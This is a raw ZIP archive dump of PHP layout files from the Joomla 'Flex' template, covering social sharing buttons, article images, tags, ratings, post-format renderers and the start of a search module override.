		<?php echo $author; ?>
	<?php endif; ?>
</dd>PK!HA[���Aflex/html/layouts/joomla/content/social_share/entrylist_share.phpnu&1i�<?php
/**
 * Flex @package Helix Framework
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
defined('JPATH_BASE') or die;

$url = JRoute::_(ContentHelperRoute::getArticleRoute($displayData->id . ':' . $displayData->alias, $displayData->catid, $displayData->language));
$root = JURI::base();
$root = new JURI($root);
$url = $root->getScheme() . '://' . $root->getHost() . $url;

$params = JFactory::getApplication()->getTemplate(true)->params;

if ($params->get('social_share')) {
    ?>
    <div class="helix-social-share">
        <div class="helix-social-share-blog">
            <ul>
            	<?php if ($params->get('share_facebook', 1)) { ?>
                <li>
                    <div class="facebook" data-toggle="tooltip" data-placement="top" title="<?php echo JText::_('HELIX_SHARE_FACEBOOK'); ?>">

                        <a class="facebook" onClick="window.open('http://www.facebook.com/sharer.php?u=<?php echo $url; ?>', 'Facebook', 'width=600,height=300,left=' + (screen.availWidth / 2 - 300) + ',top=' + (screen.availHeight / 2 - 150) + ''); return false;" href="http://www.facebook.com/sharer.php?u=<?php echo $url; ?>">
                            <i class="fab fa-facebook-f"></i>
                        </a>

                    </div>
                </li>
                <?php } ?>
				<?php if ($params->get('share_twitter', 1)) { ?>
                <li>
                    <div class="twitter"  data-toggle="tooltip" data-placement="top" title="<?php echo JText::_('HELIX_SHARE_TWITTER'); ?>">
                        <a class="twitter" onClick="window.open('http://twitter.com/share?url=<?php echo $url; ?>&amp;text=<?php echo str_replace(' ', '%20', $displayData->title); ?>', 'Twitter share', 'width=600,height=300,left=' + (screen.availWidth / 2 - 300) + ',top=' + (screen.availHeight / 2 - 150) + ''); return false;" href="http://twitter.com/share?url=<?php echo $url; ?>&amp;text=<?php echo str_replace('', '%20', $displayData->title); ?>">
                            <i class="fab fa-twitter"></i>
                        </a>
                    </div>
                </li>
                <?php } ?>
                <?php if ($params->get('share_google_plus', 1)) { ?>
                <li>
                    <div class="google-plus" data-toggle="tooltip" data-placement="top" title="<?php echo JText::_('HELIX_SHARE_GOOGLE_PLUS'); ?>">
                        <a class="google-plus" onClick="window.open('https://plus.google.com/share?url=<?php echo $url; ?>', 'Google plus', 'width=585,height=666,left=' + (screen.availWidth / 2 - 292) + ',top=' + (screen.availHeight / 2 - 333) + ''); return false;" href="https://plus.google.com/share?url=<?php echo $url; ?>" >
                            <i class="fab fa-google-plus-g"></i></a>
                    </div>
                </li>
                <?php } ?>
                <?php if ($params->get('share_linkedin', 1)) { ?>
                <li>
                    <div class="linkedin" data-toggle="tooltip" data-placement="top" title="<?php echo JText::_('HELIX_SHARE_LINKEDIN'); ?>" >
                        <a class="linkedin" onClick="window.open('http://www.linkedin.com/shareArticle?mini=true&url=<?php echo $url; ?>', 'Linkedin', 'width=585,height=666,left=' + (screen.availWidth / 2 - 292) + ',top=' + (screen.availHeight / 2 - 333) + ''); return false;" href="http://www.linkedin.com/shareArticle?mini=true&url=<?php echo $url; ?>" >
                            <i class="fab fa-linkedin-in"></i></a>
                    </div>
                </li>
                <?php } ?>
            </ul>
        </div>
    </div> <!-- /.helix-social-share -->
<?php } ?>
PK!���+
+
7flex/html/layouts/joomla/content/social_share/share.phpnu&1i�<?php
/**
 * Flex @package Helix Framework
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/

defined('JPATH_BASE') or die;

$url  	=  JRoute::_(ContentHelperRoute::getArticleRoute($displayData->id . ':' . $displayData->alias, $displayData->catid, $displayData->language));
$root 	= JURI::base();
$root 	= new JURI($root);
$url  	= $root->getScheme() . '://' . $root->getHost() . $url;

$params 	= JFactory::getApplication()->getTemplate(true)->params;

if( $params->get('social_share') ) { ?>
	<div class="helix-social-share">
		<div class="helix-social-share-blog helix-social-share-article">
			<ul>
				<?php if ($params->get('share_facebook', 1)) { ?>
				<li>
					<div class="facebook" data-toggle="tooltip" data-placement="top" title="<?php echo JText::_('HELIX_SHARE_FACEBOOK'); ?>">

						<a class="facebook" onClick="window.open('http://www.facebook.com/sharer.php?u=<?php echo $url; ?>','Facebook','width=600,height=300,left='+(screen.availWidth/2-300)+',top='+(screen.availHeight/2-150)+''); return false;" href="http://www.facebook.com/sharer.php?u=<?php echo $url; ?>">
							<i class="fab fa-facebook-square"></i> <?php echo  JText::_('HELIX_FACEBOOK'); ?>
						</a>

					</div>
				</li>
                <?php } ?>
				<?php if ($params->get('share_twitter', 1)) { ?>
				<li>
					<div class="twitter" data-toggle="tooltip" data-placement="top" title="<?php echo JText::_('HELIX_SHARE_TWITTER'); ?>">
						<a class="twitter" onClick="window.open('http://twitter.com/share?url=<?php echo $url; ?>&amp;text=<?php echo str_replace('  ', '%20', $displayData->title); ?>','Twitter share','width=600,height=300,left='+(screen.availWidth/2-300)+',top='+(screen.availHeight/2-150)+''); return false;" href="http://twitter.com/share?url=<?php echo $url; ?>&amp;text=<?php echo str_replace(' ', '%20', $displayData->title); ?>">
							<i class="fab fa-twitter-square"></i> <?php echo  JText::_('HELIX_TWITTER'); ?>
						</a>
					</div>
				</li>
                <?php } ?>
                <?php if ($params->get('share_google_plus', 1)) { ?>
				<li>
					<div class="google-plus">
						<a class="google-plus" data-toggle="tooltip" data-placement="top" title="<?php echo JText::_('HELIX_SHARE_GOOGLE_PLUS'); ?>" onClick="window.open('https://plus.google.com/share?url=<?php echo $url; ?>','Google plus','width=585,height=666,left='+(screen.availWidth/2-292)+',top='+(screen.availHeight/2-333)+''); return false;" href="https://plus.google.com/share?url=<?php echo $url; ?>" >
						<i class="fab fa-google-plus-g"></i></a>
					</div>
				</li>
				<?php } ?>
                <?php if ($params->get('share_linkedin', 1)) { ?>
				<li>
					<div class="linkedin">
						<a class="linkedin" data-toggle="tooltip" data-placement="top" title="<?php echo JText::_('HELIX_SHARE_LINKEDIN'); ?>" onClick="window.open('http://www.linkedin.com/shareArticle?mini=true&url=<?php echo $url; ?>','Linkedin','width=585,height=666,left='+(screen.availWidth/2-292)+',top='+(screen.availHeight/2-333)+''); return false;" href="http://www.linkedin.com/shareArticle?mini=true&url=<?php echo $url; ?>" >	
						<i class="fab fa-linkedin-in"></i></a>
					</div>
				</li>
                <?php } ?>
			</ul>
		</div>		
	</div> <!-- /.helix-social-share -->
<?php } ?>PK!Z���-flex/html/layouts/joomla/content/readmore.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

$params = $displayData['params'];
$item = $displayData['item'];
?>

<div class="readmore">
	<a class="btn btn-readmore" href="<?php echo $displayData['link']; ?>" itemprop="url">
		<?php if (!$params->get('access-view')) :
			echo JText::_('COM_CONTENT_REGISTER_TO_READ_MORE');
		elseif ($readmore = $item->alternative_readmore) :
			echo $readmore;
			if ($params->get('show_readmore_title', 0) != 0) :
				echo JHtml::_('string.truncate', ($item->title), $params->get('readmore_limit'));
			endif;
		elseif ($params->get('show_readmore_title', 0) == 0) :
			echo JText::sprintf('READ_MORE_TITLE');
		else :
			echo JText::_('COM_CONTENT_READ_MORE');
			echo JHtml::_('string.truncate', ($item->title), $params->get('readmore_limit'));
		endif; ?>
	</a>
</div>
PK!U��WW5flex/html/layouts/joomla/content/category_default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('JPATH_BASE') or die;

// Note that this layout opens a div with the page class suffix. If you do not use the category children
// layout you need to close this div either by overriding this file or in your main layout.
$params    = $displayData->params;
$extension = $displayData->get('category')->extension;
$canEdit   = $params->get('access-edit');
$className = substr($extension, 4);

// Include template's params
$tpl_params 	= JFactory::getApplication()->getTemplate(true)->params;
$has_lazyload = $tpl_params->get('lazyload', 1);

// This will work for the core components but not necessarily for other components
// that may have different pluralisation rules.
if (substr($className, -1) == 's')
{
	$className = rtrim($className, 's');
}
$tagsData = $displayData->get('category')->tags->itemTags;
?>
<div>
	<div class="<?php echo $className .'-category' . $displayData->pageclass_sfx;?>">
		<?php if ($params->get('show_page_heading')) : ?>
			<h1>
				<?php echo $displayData->escape($params->get('page_heading')); ?>
			</h1>
		<?php endif; ?>
		<?php if($params->get('show_category_title', 1)) : ?>
			<h2>
				<?php echo JHtml::_('content.prepare', $displayData->get('category')->title, '', $extension . '.category.title'); ?>
			</h2>
		<?php endif; ?>
		<?php if ($params->get('show_cat_tags', 1)) : ?>
			<?php echo JLayoutHelper::render('joomla.content.tags', $tagsData); ?>
		<?php endif; ?>
		<?php if ($params->get('show_description', 1) || $params->def('show_description_image', 1)) : ?>
			<div class="category-desc">
				<?php if ($params->get('show_description_image') && $displayData->get('category')->getParams()->get('image')) : ?>
                <?php 
				$cat_image = $displayData->get('category')->getParams()->get('image');
					if(strpos($cat_image, 'http://') !== false || strpos($cat_image, 'https://') !== false){
						if($has_lazyload) { ?>
                        	<img class="lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="<?php echo $cat_image; ?>" alt="<?php echo htmlspecialchars($displayData->get('category')->getParams()->get('image_alt')); ?>" data-expand="-10">
                    	<?php } else { ?>
                        	<img src="<?php echo $cat_image; ?>" alt="<?php echo htmlspecialchars($displayData->get('category')->getParams()->get('image_alt')); ?>">
                        <?php } 
						} else { 
                        if($has_lazyload) { ?>
                        	<img class="lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="<?php echo JUri::root() . $cat_image; ?>" alt="<?php echo htmlspecialchars($displayData->get('category')->getParams()->get('image_alt')); ?>" data-expand="-10">
                    	<?php } else { ?>
                        	<img src="<?php echo $cat_image; ?>" alt="<?php echo htmlspecialchars($displayData->get('category')->getParams()->get('image_alt')); ?>">
                        <?php }
					} ?>
				<?php endif; ?>
				<?php if ($params->get('show_description') && $displayData->get('category')->description) : ?>
					<?php echo JHtml::_('content.prepare', $displayData->get('category')->description, '', $extension . '.category'); ?>
				<?php endif; ?>
				<div class="clr"></div>
			</div>
		<?php endif; ?>
		<?php echo $displayData->loadTemplate($displayData->subtemplatename); ?>

		<?php if ($displayData->get('children') && $displayData->maxLevel != 0) : ?>
			<div class="cat-children">
				<h3>
					<?php echo JTEXT::_('JGLOBAL_SUBCATEGORIES'); ?>
				</h3>

				<?php echo $displayData->loadTemplate('children'); ?>
			</div>
		<?php endif; ?>
	</div>
</div>

PK!��K66+flex/html/layouts/joomla/content/rating.phpnu&1i�<?php
/**
 * @package     Helix3
 * @subpackage  Layout
 * @author 		JoomShaper
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('JPATH_BASE') or die;

if($displayData['params']->get('show_vote')) {

$rating = (int) $displayData['item']->rating;
$layout = JRequest::getCmd('view', 'article');

$rating_count = $displayData['item']->rating_count;
if($rating_count == '') {
	$rating_count = 0;
}

$class_name = '';

if ($layout == 'article') {
	$class_name = ' sp-rating';
}
?>
	<dd class="post_rating" id="post_vote_<?php echo $displayData['item']->id; ?>">
		<?php echo JText::_('HELIX3_ARTICLE_RATING'); ?>: <div class="voting-symbol<?php echo $class_name; ?>">
			<?php
			$j = 0;
			for($i = $rating; $i < 5; $i++){
				echo '<span class="star" data-number="'.(5-$j).'"></span>';
				$j = $j+1;
			}
			for ($i = 0; $i < $rating; $i++)
			{
				echo '<span class="star active" data-number="'.($rating - $i).'"></span>';
			}
			?>
		</div>
		<span class="ajax-loader fas fa-spinner fa-spin"></span>
		<span class="voting-result">( <?php echo ($rating_count>1) ? $rating_count . ' ' . JText::_('HELIX3_COUNT_RATINGS') : $rating_count . ' ' . JText::_('HELIX3_COUNT_RATING'); ?> )</span>
</dd>
<?php }PK!tX�%		/flex/html/layouts/joomla/content/full_image.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
$params = $displayData->params;
$tplParams = JFactory::getApplication()->getTemplate(true)->params; // Template's params
$attribs = json_decode($displayData->attribs);
$images = json_decode($displayData->images);
// Include lazy load params
$has_lazyload = $tplParams->get('lazyload', 1);
$full_image 	= '';

if(isset($attribs->spfeatured_image) && $attribs->spfeatured_image != '') {
	$full_image = $attribs->spfeatured_image;
} elseif(isset($images->image_fulltext) && !empty($images->image_fulltext)) {
	$full_image = $images->image_fulltext;
}

// Image alt (from Flex 3.8.3)
$intro_alt = ($images->image_fulltext_alt != '') ? $intro_alt = htmlspecialchars($images->image_fulltext_alt) : $intro_alt = htmlspecialchars($this->escape($displayData->title));
?>
<?php if(!empty($full_image) || (isset($images->image_fulltext) && !empty($images->image_fulltext))) { ?>
	<?php $imgfloat = (empty($images->float_fulltext)) ? $params->get('float_fulltext') : $images->float_fulltext; ?>
	<div class="entry-image full-image">
		<?php if ($images->image_fulltext_caption) : echo '<div class="img-caption-overlay">'. htmlspecialchars($images->image_fulltext_caption) .'</div>'; endif; ?>
		<?php if(strpos($full_image, 'http://') !== false || strpos($full_image, 'https://') !== false){
			if($has_lazyload) { ?>
				<img class="lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="<?php echo htmlspecialchars($full_image); ?>" alt="<?php echo $intro_alt; ?>">
			<?php } else { ?>
			<img src="<?php echo htmlspecialchars($full_image); ?>" alt="<?php echo $intro_alt; ?>" itemprop="image">
			<?php } 
			} else { 
			if($has_lazyload) { ?>
				<img class="lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="<?php echo JUri::root() . htmlspecialchars($full_image); ?>" alt="<?php echo $intro_alt; ?>">
			<?php } else { ?>
			<img src="<?php echo htmlspecialchars($full_image); ?>" alt="<?php echo $intro_alt; ?>" itemprop="image">
			<?php }
		} ?>
     </div>
<?php } ?>
PK!85�vv)flex/html/layouts/joomla/content/tags.phpnu&1i�<?php
/**
 * Flex @package Helix Framework
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
defined('JPATH_BASE') or die;

use Joomla\Registry\Registry;

JLoader::register('TagsHelperRoute', JPATH_BASE . '/components/com_tags/helpers/route.php');

?>
<?php if (!empty($displayData)) : ?>
	<div class="tags">
    	<?php // Tags or (one) tag
		foreach ($displayData as $n => $nmb) :
			if($n == 0) :
				$number_tags = '';
            else : 
				$number_tags = 's';
            endif;
		endforeach; ?>
        <span><i class="fas fa-tag<?php echo $number_tags; ?> hasTooltip" title="<?php echo JText::_('HELIX_TAGS'); ?>"></i></span>   
		<?php foreach ($displayData as $i => $tag) : ?>
			<?php if (in_array($tag->access, JAccess::getAuthorisedViewLevels(JFactory::getUser()->get('id')))) : ?>
				<?php $tagParams = new Registry($tag->params); ?>
				<?php $link_class = $tagParams->get('tag_link_class'); ?>
				<a href="<?php echo JRoute::_(TagsHelperRoute::getTagRoute($tag->tag_id . '-' . $tag->alias)) ?>" class="<?php echo $link_class; ?>" rel="tag"><?php echo $this->escape($tag->title); ?></a>
				<?php if ($link_class != 'label label-info') { 
					if($i != (count($displayData)-1)) echo ','; ?>	
				<?php } ?>
			<?php endif; ?>
		<?php endforeach; ?>
	</div>
<?php endif; ?>
PK!P��VV<flex/html/layouts/joomla/content/post_formats/post_video.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access

defined('JPATH_BASE') or die;

// Include template's params
$tpl_params 	= JFactory::getApplication()->getTemplate(true)->params;
$major_color = ($tpl_params->get('preset1_major') != '') ? $tpl_params->get('preset1_major') : 'F14833';

if ( $displayData['params']->get('video') ) {
	
	$video = parse_url($displayData['params']->get('video'));
	$output = '';

	switch($video['host']) {
		case 'youtu.be':
		$video_id 	= trim($video['path'],'/');
		$video_src 	= '//www.youtube.com/embed/' . $video_id;
		break;

		case 'www.youtube.com':
		case 'youtube.com':
		//parse_str($video['query'], $query);
		//$video_id 	= $query['v'];
		$video_id 	= trim($video['path'],'/embed');
		$video_src 	= 'https://www.youtube.com/embed/' . $video_id . '?showinfo=0&#038;controls=1';
		break;

		case 'vimeo.com':
		case 'www.vimeo.com':
		$video_id 	= trim($video['path'],'/');
		$video_src 	= "https://player.vimeo.com/video/". $video_id ."?title=0&byline=0&portrait=0&color=". trim($major_color,'#') ."";
	}

	if($video_src) {
		$output .= '<div class="entry-video embed-responsive embed-responsive-16by9">';
		$output .= '<iframe class="embed-responsive-item" src="'. $video_src .'" frameborder="0" allow="autoplay; encrypted-media" webkitAllowFullScreen mozallowfullscreen allowFullScreen></iframe>';
		$output .= '</div>';
		echo $output;
	} // has video source
	
} // has video value
PK!���227flex/html/layouts/joomla/content/post_formats/icons.phpnu&1i�<?php
/**
 * Flex @package Helix Framework
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
defined('JPATH_BASE') or die;

$params 	= JFactory::getApplication()->getTemplate(true)->params;

$format = $displayData;

if($params->get('show_post_format')) {

	//echo '<span class="post-format">';

	if (  $format == 'audio' ) {
		if ( $params->get('custom_audio_icon') != '' ) {
			echo '<i class="' .$params->get('custom_audio_icon') .'"></i>';
		} else {
			echo '<i class="fas fa-music"></i>';
		}
	} else if (  $format == 'video' ) {
		if ( $params->get('custom_video_icon') != '' ) {
			echo '<i class="' .$params->get('custom_video_icon') .'"></i>';
		} else {
			echo '<i class="fas fa-video"></i>';
		}
	} else if (  $format == 'gallery' ) {
		if ( $params->get('custom_gallery_icon') != '' ) {
			echo '<i class="' .$params->get('custom_gallery_icon') .'"></i>';
		} else {
			echo '<i class="far fa-images"></i>';
		}
	} else if (  $format == 'quote' ) {
		if ( $params->get('custom_quote_icon') != '' ) {
			echo '<i class="'. $params->get('custom_quote_icon') .'"></i>';
		} else {
			echo '<i class="fas fa-quote-left"></i>';
		}
	} else if (  $format == 'link' ) {
		if ( $params->get('custom_link_icon') != '' ) {
			echo '<i class="'. $params->get('custom_link_icon') .'"></i>';
		} else {
			echo '<i class="fas fa-link"></i>';
		}
	} else if (  $format == 'status' ) {
		if ( $params->get('custom_status_icon') != '' ) {
			echo '<i class="'. $params->get('custom_status_icon') .'"></i>';
		} else {
			echo '<i class="far fa-comment"></i>';
		}
	} else if (  $format == 'custom' ) {
		if ( $params->get('custom_post_icon') != '' ) {
			echo '<i class="'. $params->get('custom_post_icon') .'"></i>';
		} else {
			echo '<i class="far fa-thumbs-up"></i>';
		}
	} else {
		if ( $params->get('custom_standard_icon') != '' ) {
			echo '<i class="'. $params->get('custom_standard_icon') .'"></i>';
		} else {
			echo '<i class="fas fa-stream"></i>';
		}
	}
	//echo '</span>';

} 
PK!��m�}};flex/html/layouts/joomla/content/post_formats/post_link.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('JPATH_BASE') or die;

if ( $displayData['params']->get('link_url') ) {

	$link_title = ( $displayData['params']->get('link_title') ) ? $displayData['params']->get('link_title') : $displayData['params']->get('link_url');

	?>
	<div class="entry-link">
		<a target="_blank" href="<?php echo $displayData['params']->get('link_url'); ?>"><h4><?php echo $link_title; ?></h4></a>
	</div>
	<?php
}
PK!���>flex/html/layouts/joomla/content/post_formats/post_gallery.phpnu&1i�<?php
/**
 * Flex @package Helix3 Framework
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2019 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
//no direct access
defined('JPATH_BASE') or die;

$doc = JFactory::getDocument();
$app = JFactory::getApplication();
JHtml::_('jquery.framework');

$item = $displayData['item'];

$items_per_row = ($displayData['params']->get('items_per_row') != '') ? $items_per_row = $displayData['params']->get('items_per_row') : $items_per_row = '1';
$margin_between_items = ($displayData['params']->get('$margin_between_items') != '' || $displayData['params']->get('items_per_row') != '') ? $margin_between_items = 'slideMargin:' . $displayData['params']->get('margin_between_items') .',' : $margin_between_items = 'slideMargin:0,';
$transition_effect = $displayData['params']->get('transition_effect');
$transition_duration = ($displayData['params']->get('transition_duration') != 0) ? $transition_duration = $displayData['params']->get('transition_duration') : $transition_duration = '700';
$show_arrows = $displayData['params']->get('show_arrows', 1);
$arrow_size = ($displayData['params']->get('arrow_size') != '') ? $arrow_size = $displayData['params']->get('arrow_size') : $arrow_size = '44';
$arrow_icons = $displayData['params']->get('arrow_icons');
$arrows_bg = ($displayData['params']->get('arrows_bg') != '') ? $arrows_bg = 'background:' . $displayData['params']->get('arrows_bg') . ';' : $arrows_bg = 'background:rgba(10,10,10,.3);';
$arrows_color = ($displayData['params']->get('arrows_color') != '') ? $arrows_color = '.lSAction > a {color:' . $displayData['params']->get('arrows_color') . '}' : $arrows_color = '';
$arrows_color_style = ($displayData['params']->get('arrows_color') != '') ? $arrows_color_style = 'color:' . $displayData['params']->get('arrows_color') . ';' : $arrows_color_style = '';
$show_pager = $displayData['params']->get('show_pager');
$autoplay = $displayData['params']->get('autoplay', 1);
$auto_transition = ($displayData['params']->get('autoplay') != 0) ? $auto_transition = $displayData['params']->get('auto_transition') . '000' : $auto_transition = '5000';
$ltr_rtl = $displayData['params']->get('ltr_rtl');
$items_per_row > 2 ? $responsive_items_per_row = ( $displayData['params']->get('items_per_row') - 1 ) : $responsive_items_per_row = '1';
	
$left_arrow = '';
$right_arrow = '';
if ($arrow_icons == 'pixeden-circle') {
		$left_arrow = 'pe pe-7s-angle-left-circle';
	$right_arrow = 'pe pe-7s-angle-right-circle';
} elseif ($arrow_icons == 'fontawesome-angle') {
	$left_arrow = 'fas fa-angle-left';
	$right_arrow = 'fas fa-angle-right';
} elseif ($arrow_icons == 'fontawesome-chevron') {
	$left_arrow = 'fas fa-chevron-left';
	$right_arrow = 'fas fa-chevron-right';
} else {
	$left_arrow = 'pe pe-7s-angle-left';
	$right_arrow = 'pe pe-7s-angle-right';
}

// Image alt (from Flex 3.8.3)
$intro_alt = $item->title;
?>
<?php 
if($displayData['params']->get('gallery')) {
	$images = json_decode( $displayData['params']->get('gallery') );
	$randomid = rand(1,1000);
	// Add CSS styling
	if ($show_arrows == 1) {
	$arrows_style = '.lSPrev,.lSNext{'
		. 'height:'.$arrow_size.'px;'
		. 'width:'.$arrow_size.'px;'
		. '}'
		. '.lSPrev>i,.lSNext>i{'
		. 'font-size:'.$arrow_size.'px;}'; 
		$doc->addStyledeclaration($arrows_style);
	}
	$html = '';
	$html .= '<div class="entry-gallery">';
		if( count( $images->gallery_images ) ) {     
			$html .= '<ul id="post-slider-'. $randomid .'" class="list-unstyled post-slides">';
			foreach ( $images->gallery_images as $key => $image ) {  

			    $active = ($key===0) ? ' active' : '';
				$html .= '<li class="item'. $active .'">';
				$html .= '<img src="'. $image .'" alt="'. $intro_alt .'">';
				$html .= '</li>';
			} 
			$html .= '</ul>';  
		}
	$html .= '</div>';
	echo $html;
} ?>
<script type="text/javascript">
 jQuery(function($){
	var $post_slider = $("#post-slider-<?php echo $randomid; ?>");
	$post_slider.imagesLoaded(function(){
	$($post_slider).lightSlider({
		<?php if ($show_arrows == 0) { ?>controls: false,<?php } ?>
prevHtml:'<i style="width:<?php echo $arrow_size; ?>px;height:<?php echo $arrow_size; ?>px;margin-top:-<?php echo round($arrow_size / 2); ?>px;font-size:<?php echo $arrow_size; ?>px;<?php echo $arrows_color_style . $arrows_bg; ?>" class="<?php echo $left_arrow; ?>"></i>',
		nextHtml:'<i style="width:<?php echo $arrow_size; ?>px;height:<?php echo $arrow_size; ?>px;margin-top:-<?php echo round($arrow_size / 2); ?>px;font-size:<?php echo $arrow_size; ?>px;<?php echo $arrows_color_style . $arrows_bg; ?>" class="<?php echo $right_arrow; ?>"></i>',
		item:<?php echo $items_per_row; ?>,
		slideMove:<?php echo $items_per_row; ?>,
		loop:true,
		<?php echo $margin_between_items; ?>
		
		pauseOnHover:true,
		<?php if ($autoplay == 1) { ?>auto:true,
		pause:<?php echo $auto_transition; ?>,
		<?php } ?>
speed:<?php echo $transition_duration; ?>,
		<?php if ($show_pager == 0) { ?>pager:false,<?php } ?>
<?php if ($transition_effect == 'fade') { ?>mode:'fade',<?php } ?>
<?php if ($ltr_rtl == 2) { ?>rtl:true,<?php } ?>
		
		cssEasing: 'cubic-bezier(0.75, 0, 0.35, 1)',
		adaptiveHeight:true,
		keyPress:true,
		responsive:[{breakpoint:768,settings:{item:<?php echo $responsive_items_per_row; ?>}},{breakpoint:480,settings:{item:1}}]
		});
	});
});
</script>PK!|(�I��=flex/html/layouts/joomla/content/post_formats/post_custom.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('JPATH_BASE') or die;

if( $displayData['params']->get('custom_post') ) {
	echo '<div class="entry-gallery">';
	echo $displayData['params']->get('custom_post');
	echo '</div>';
}

PK!Ql���<flex/html/layouts/joomla/content/post_formats/post_quote.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('JPATH_BASE') or die;

if ( $displayData['params']->get('quote_text') ) {
	?>
	<div class="entry-quote">
		<blockquote>
			<p><i class="fa fa-quote-left"></i><?php echo $displayData['params']->get('quote_text'); ?><i class="fa fa-quote-right"></i></p>
			<?php if ( $displayData['params']->get('quote_author') ) { ?>
				<small><?php echo $displayData['params']->get('quote_author'); ?></small>
			<?php } ?>
		</blockquote>
	</div>
	<?php
}
PK!���P��<flex/html/layouts/joomla/content/post_formats/post_audio.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('JPATH_BASE') or die;

if ( $displayData['params']->get('audio') ) {
	?>
	<div class="entry-audio embed-responsive embed-responsive-16by9">
		<?php echo $displayData['params']->get('audio'); ?>
	</div>
	<?php
}
PK!>��ͦ�=flex/html/layouts/joomla/content/post_formats/post_status.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('JPATH_BASE') or die;

if( $displayData['params']->get('post_status') ) {
	echo '<div class="entry-status">';
	echo $displayData['params']->get('post_status');
	echo '</div>';
}PK!۸�7flex/html/layouts/joomla/content/categories_default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

?>
<div class="categories-list<?php echo $displayData->pageclass_sfx;?>">
<?php if ($displayData->params->get('show_page_heading')) : ?>
<h1>
	<?php echo $displayData->escape($displayData->params->get('page_heading')); ?>
</h1>
<?php endif; ?>

<?php if ($displayData->params->get('show_base_description')) : ?>
	<?php //If there is a description in the menu parameters use that; ?>
		<?php if($displayData->params->get('categories_description')) : ?>
			<div class="category-desc base-desc">
			<?php echo JHtml::_('content.prepare', $displayData->params->get('categories_description'), '',  $displayData->get('extension') . '.categories'); ?>
			</div>
		<?php else : ?>
			<?php //Otherwise get one from the database if it exists. ?>
			<?php  if ($displayData->parent->description) : ?>
				<div class="category-desc base-desc">
					<?php echo JHtml::_('content.prepare', $displayData->parent->description, '', $displayData->parent->extension . '.categories'); ?>
				</div>
			<?php endif; ?>
		<?php endif; ?>
	<?php endif; ?>
</div>PK!�IZ��� flex/html/mod_finder/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  mod_finder
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::addIncludePath(JPATH_SITE . '/components/com_finder/helpers/html');

JHtml::_('jquery.framework');
JHtml::_('formbehavior.chosen');
JHtml::_('bootstrap.tooltip');

// Load the smart search component language file.
$lang = JFactory::getLanguage();
$lang->load('com_finder', JPATH_SITE);

$suffix = $params->get('moduleclass_sfx');
$output = '<div class="search flex-search">';
